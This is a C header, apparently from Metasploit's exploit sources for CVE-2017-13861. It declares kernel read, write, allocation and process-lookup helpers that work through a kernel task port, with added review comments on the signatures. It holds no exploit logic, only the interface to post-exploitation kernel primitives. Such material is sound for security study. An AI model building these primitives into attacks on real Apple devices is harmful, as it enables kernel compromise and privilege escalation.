GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/kernel_utils.h
#import <stdio.h>
#import <mach-o/loader.h>
#import <stdlib.h>
#import <fcntl.h>
#import <unistd.h>
#import <errno.h>
#import <mach/mach.h>
#import <sys/stat.h>
// Needed definitions
//
// Hand-written prototypes for the mach_vm_* family. Every call acts on the
// address space of the task named by its first argument and reports failure
// through the kern_return_t result, which should be compared with
// KERN_SUCCESS before any output parameter is used.
// NOTE(review): copies like these can drift from the system's own
// definitions; keep the signatures in step with the SDK being built against.

// Allocates `size` bytes in `target`; `*address` is both the requested and
// the resulting address, `flags` selects the placement policy.
kern_return_t mach_vm_allocate(vm_map_t target,
                               mach_vm_address_t *address,
                               mach_vm_size_t size,
                               int flags);

// Copies `size` bytes from `address` in `target_task` into the caller's
// buffer at `data`; the number of bytes copied is stored in `*outsize`.
kern_return_t mach_vm_read_overwrite(vm_map_t target_task,
                                     mach_vm_address_t address,
                                     mach_vm_size_t size,
                                     mach_vm_address_t data,
                                     mach_vm_size_t *outsize);

// Copies `dataCnt` bytes from the caller's buffer `data` to `address` in
// `target_task`.
kern_return_t mach_vm_write(vm_map_t target_task,
                            mach_vm_address_t address,
                            vm_offset_t data,
                            mach_msg_type_number_t dataCnt);

// Releases the range [address, address + size) in `target`.
kern_return_t mach_vm_deallocate(vm_map_t target,
                                 mach_vm_address_t address,
                                 mach_vm_size_t size);

// Changes the protection of a range; `set_maximum` selects the maximum
// protection instead of the current one.
kern_return_t mach_vm_protect(vm_map_t target_task,
                              mach_vm_address_t address,
                              mach_vm_size_t size,
                              boolean_t set_maximum,
                              vm_prot_t new_protection);

// Reads `size` bytes into a buffer the kernel maps into the caller; the
// buffer is returned through `*data` / `*dataCnt` and has to be deallocated
// by the caller once it is no longer needed.
kern_return_t mach_vm_read(vm_map_t target_task,
                           mach_vm_address_t address,
                           mach_vm_size_t size,
                           vm_offset_t *data,
                           mach_msg_type_number_t *dataCnt);

// Looks up the region at or after `*address`; `*address` and `*size` are
// updated to describe it and `info` receives `*infoCnt` words of `flavor`
// data.
kern_return_t mach_vm_region(vm_map_t target_task,
                             mach_vm_address_t *address,
                             mach_vm_size_t *size,
                             vm_region_flavor_t flavor,
                             vm_region_info_t info,
                             mach_msg_type_number_t *infoCnt,
                             mach_port_t *object_name);
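// init function
//
// Hands the module the Mach port and the kernel base address it works with.
// NOTE(review): going by the parameter name, tfp0 is presumably a send right
// to the kernel task port, and the other declarations in this header
// presumably rely on this call having been made first. Neither is visible
// from the header -- confirm in the implementation.
void init_kernel_utils(mach_port_t tfp0, uint64_t kbase);

// Returns the kernel slide as a 64-bit value.
// NOTE(review): presumably derived from the kbase passed to
// init_kernel_utils() -- confirm.
// Declared with (void): an empty parameter list in C leaves the arguments
// unchecked, so a call with a stray argument would compile silently.
uint64_t get_kernel_slide(void);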
// kernel memory stuff
//
// Every `where`, `dest`, `src`, `kstr` and returned address below is a plain
// 64-bit integer, not a pointer, so the compiler cannot tell a kernel address
// from any other number. None of the signatures carries a bound for the
// kernel-side range: the validity of each address is entirely the caller's
// responsibility.

// Transfers `size` bytes between kernel address `where` and the local buffer
// `p`. NOTE(review): the size_t result is presumably the number of bytes
// actually transferred; a caller should compare it with `size` -- confirm.
size_t KernelRead(uint64_t where, void *p, size_t size);

// Fixed-width reads. The value is the only result, so a failed read cannot
// be told apart from data by looking at the return value alone.
uint32_t KernelRead_32bits(uint64_t where);
uint64_t KernelRead_64bits(uint64_t where);

// Write counterpart of KernelRead; `p` is read-only for the callee.
size_t KernelWrite(uint64_t where, const void *p, size_t size);

// Fixed-width writes. They return void, so failure is not reported to the
// caller through the signature.
void KernelWrite_32bits(uint64_t where, uint32_t what);
void KernelWrite_64bits(uint64_t where, uint64_t what);

// Copies `length` bytes from `src` to `dest`. Note that `length` is a
// uint32_t here while KernelRead/KernelWrite take size_t; a larger size_t
// value passed in would be truncated by the implicit conversion.
void Kernel_memcpy(uint64_t dest, uint64_t src, uint32_t length);

// Allocation helpers. NOTE(review): the returned uint64_t is presumably the
// address of the new region, with 0 meaning failure -- confirm. The three
// functions use three different size/address types (vm_size_t, uint64_t,
// mach_vm_address_t), so watch for narrowing when mixing them.
void Kernel_free(mach_vm_address_t address, vm_size_t size);
uint64_t Kernel_alloc(vm_size_t size);
uint64_t Kernel_alloc_wired(uint64_t size);

// Compares the string at address `kstr` with the local C string `str`.
// NOTE(review): presumably follows strcmp()'s sign convention -- confirm.
int Kernel_strcmp(uint64_t kstr, const char *str);
// for messing with processes
//
// Maps a process id to a 64-bit value.
// NOTE(review): presumably the kernel address of that process's proc
// structure, with 0 when no such process exists -- neither is visible from
// this header, confirm in the implementation before relying on it.
uint64_t proc_of_pid(pid_t pid);
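// used to fix what kexecute returns
//
// Four consecutive 64-bit fields: 32 bytes, no padding.
// NOTE(review): the name and the prev/next/start/end fields suggest this
// mirrors the header of a kernel map read back from kernel memory; if so the
// layout must match the running kernel exactly -- confirm against the
// implementation. (The page listing had line numbers interleaved with the
// fields; they are removed here so the definition parses.)
typedef struct {
    uint64_t prev;
    uint64_t next;
    uint64_t start;
    uint64_t end;
} kmap_hdr_t;

// Takes a 64-bit address and returns a 64-bit address.
// NOTE(review): per the comment above, presumably repairs a value returned
// by kexecute using the start/end range of a kmap_hdr_t -- confirm.
uint64_t ZmFixAddr(uint64_t addr);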